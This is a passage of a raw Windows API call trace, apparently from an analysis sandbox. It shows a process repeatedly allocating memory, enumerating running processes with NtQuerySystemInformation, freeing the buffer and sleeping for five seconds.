BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.610] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.766] NtQuerySystemInformation (in: 